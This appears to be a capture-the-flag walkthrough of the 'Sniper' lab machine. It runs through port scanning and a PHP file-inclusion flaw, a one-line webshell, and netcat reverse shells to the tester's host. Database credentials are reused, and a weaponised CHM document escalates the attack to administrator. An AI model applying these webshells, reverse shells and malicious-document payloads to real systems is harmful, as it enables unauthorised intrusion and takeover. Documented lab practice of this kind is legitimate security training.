Sniper
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.151 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Wed Mar 22 09:59:49 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.151
Nmap scan report for 10.10.10.151
Host is up (0.039s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49667/tcp open unknown
# Nmap done at Wed Mar 22 10:00:15 2023 -- 1 IP address (1 host up) scanned in 26.45 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135,139,445,49667 10.10.10.151 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Wed Mar 22 10:00:54 2023 as: nmap -sCV -p80,135,139,445,49667 -Pn -oN targeted 10.10.10.151
Nmap scan report for 10.10.10.151
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Sniper Co.
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-03-22T16:01:53
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: 7h00m01s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 22 10:02:30 2023 -- 1 IP address (1 host up) scanned in 96.02 secondsThe Sniper Co. website has a few links, but only the services link and user portal work.
The services link will go to the /blog/index.php page.
We can choose the language of the site, then the PHP file of that language will be loaded with the lang GET parameter.
Exploitation
As we know this is a windows machine, we could try to exploit a local file inclusion in the lang parameter by putting the Windows absolute path of the /etc/hosts file.
http://10.10.10.151/blog/?lang=\Windows\System32\Drivers\etc\hosts
Now that we know that it is vulnerable to LFI, we could try to exploit RFI (Remote File Inclusion). As it is a Windows machine, and the website runs PHP, let's create a PHP webshell and share it with an SMB server.
echo '<?php system($_GET["cmd"]);?>' > pwn.php
impacket-smbserver smbFolder $(pwd) -smb2support
Now, if we try to retrieve the pwn.php from our SMB server will see that it is not really working.
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=whoami
This happens sometime because of authentication issues with the SMB server. We could try to share the file with net usershare.
service smbd start
net usershare add smbFolder $(pwd) '' 'Everyone:F' 'guest_ok=y'
Now, it should work, and we should be able to run commands as nt authority\iusr.
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=whoami
Time to get a shell. First, copy the nc.exe binary from SecLists into our current directory.
cp /opt/SecLists/Web-Shells/FuzzDB/nc.exe .
Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Finally, send a reverse shell to the netcat listener using the nc.exe binary shared with our SMB server.
view-source:10.10.10.151/blog/?lang=\10.10.14.11\smbFolder\pwn.php&cmd=\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.151 49677
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\blog>whoami
whoami
nt authority\iusrPrivilege Escalation
If we go back one directory and go to C:\inetpub\wwwroot\user, we'll see a file called db.php with some database credentials.
type \inetpub\wwwroot\user\db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>As seen below, there is one user called Chris.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Chris DefaultAccount
Guest WDAGUtilityAccount
The command completed with one or more errors.We could try to see if he is reusing the same password as the database user. Let's get a PowerShell shell, a try to run commands as Chris creating PSCredentials and using Invoke-Command.
powershell
hostname
$user = "Sniper\chris"
$password = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock { whoami }
sniper/chrisAs we can run commands as chris, let's get a reverse shell as him. First, set another netcat listener on port 5555.
rlwrap nc -lvnp 5555
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Then send the reverse shell using Invoke-Command. Then, we'll be able to grab the user flag.
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock { \10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555 }
Listening on 0.0.0.0 5555
Connection received on 10.10.10.151 49684
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Chris\Documents>whoami
whoami
sniper\chris
C:\Users\Chris\Documents>type \users\chris\desktop\user.txt
type \users\chris\desktop\user.txt
ab1b4b2cbc4b00100e1a012589859379Taking a look at the directories, we'll see that there is a directory called Docs with a file called note.txt.
dir \docs
Volume in drive C has no label.
Volume Serial Number is 2382-B43B
Directory of C:\docs
10/01/2019 01:04 PM <DIR> .
10/01/2019 01:04 PM <DIR> ..
04/11/2019 09:31 AM 285 note.txt
04/11/2019 09:17 AM 552,607 php for dummies-trial.pdf
2 File(s) 552,892 bytes
2 Dir(s) 2,283,577,344 bytes freeThe note says something about putting some file in that directory.
type \docs\note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.In fact, if we take a look in the downloads folder of chris, we'll see a .chm file. Which means that maybe the Sniper CEO is waiting for a CHM in the Docs directory.
dir \users\chris\downloads
Volume in drive C has no label.
Volume Serial Number is 2382-B43B
Directory of C:\users\chris\downloads
04/11/2019 08:36 AM <DIR> .
04/11/2019 08:36 AM <DIR> ..
04/11/2019 08:36 AM 10,462 instructions.chm
1 File(s) 10,462 bytes
2 Dir(s) 2,283,577,344 bytes freeWe could try to create a malicious file and drop it in the docs directory, so when someone opens it, it will send us a reverse shell as that user. To compile this type of files, we'll need to install Microsoft HTML Help Workshop on a Windows machine. Download the installer from here.
We can compile a malicious CHM file with a custom payload with the Out-CHM.ps1 script from Nishang. On our Windows machine, import the script with PowerShell. Make sure to turn off Windows Defender.
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1')
Then, compile the CHM file with a payload that will send us a reverse shell to port 6666 using the nc.exe binary located in C:\Docs.
Out-CHM -Payload "C:\Docs\nc.exe -e cmd 10.10.14.11 6666" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
This will create the doc.chm file. Transfer it to our Linux machine, and then place it into the Docs directory together with the nc.exe binary.
copy \10.10.14.11\smbFolder\nc.exe
copy \10.10.14.11\smbFolder\doc.chm
dir
Volume in drive C has no label.
Volume Serial Number is 2382-B43B
Directory of C:\Docs
03/22/2023 06:43 PM <DIR> .
03/22/2023 06:43 PM <DIR> ..
03/22/2023 04:31 AM 13,430 doc.chm
03/22/2023 03:43 AM 28,160 nc.exe
04/11/2019 09:31 AM 285 note.txt
04/11/2019 09:17 AM 552,607 php for dummies-trial.pdf
4 File(s) 594,482 bytes
2 Dir(s) 2,283,245,568 bytes freeFinally, set a netcat listerner on port 6666, and wait to get the reverse shell as the administrator. Then all we have to do is reap the harvest and take the root flag.
rlwrap nc -lvnp 6666
Listening on 0.0.0.0 6666
Connection received on 10.10.10.151 49690
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
61a944ebe41ca6ee9b841244179aabf5Last updated
Was this helpful?